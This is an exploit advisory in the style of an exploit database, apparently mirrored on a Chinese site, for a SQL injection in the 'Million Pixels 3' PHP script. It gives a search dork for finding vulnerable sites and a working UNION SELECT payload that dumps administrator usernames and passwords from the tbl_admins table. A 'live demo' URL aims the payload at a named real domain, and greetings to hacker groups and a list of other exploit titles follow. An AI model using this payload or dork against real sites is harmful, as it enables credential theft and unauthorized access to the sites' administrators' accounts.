#################################################################

#

# Million Pixels 3 (id_cat) Remote SQL Injection Vulnerability

#

#========================================================

# =

# Author: Hussin X =

# =

# Home : www.tryag.cc/cc

# =

# email: darkangel_g85[at]Yahoo[DoT]com =

# =

# =

#========================================================

#

# script : http://e-topbiz.com/oprema/pages/millionpixels3.php

#

# DorK : inurl: "tops_top.php? id_cat ="

#################################################################

Exploit:

www.[target].com/Script/tops_top.php?id_cat=-5/**/UNION/**/SELECT/**/1,concat_ws(0x3a,UserName,Password)/**/from/**/tbl_admins/*

L!VE DEMO:

http://e-topbiz.com/trafficdemos/pixel3/tops_top.php?id_cat=-5/**/UNION/**/SELECT/**/1,concat_ws(0x3a,UserName,Password)/**/from/**/tbl_admins/*

########################( Greetz )###########################

# #

# tryag.cc / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUR /str0ke #

# #

# Iraqihack / FAHD / mos_chori / Silic0n #

# #

#############################################################

Im IRAQi

【Million Pixels 3 (id_cat) Remote SQL Injection Vulnerability】相关文章：

★ TGS CMS 0.3.2r2 Remote Code Execution Exploit

★ Ultra Office ActiveX Control Remote Arbitrary File Corruption Exploit

★ Pars4U Videosharing V1 XSS / Remote Blind SQL Injection Exploit

★ Xerox Phaser 8400 (reboot) Remote Denial of Service Exploit

★ pLink 2.07 (linkto.php id) Remote Blind SQL Injection Exploit

★ Rianxosencabos CMS 0.9 Remote Add Admin Exploit

★ Joomla Component EZ Store Remote Blind SQL Injection Exploit

★ LoveCMS 1.6.2 Final Remote Code Execution Exploit

★ VMware Workstation (hcmon.sys 6.0.0.45731) Local DoS Vulnerability

★ Maian Music 1.0 Insecure Cookie Handling Vulnerability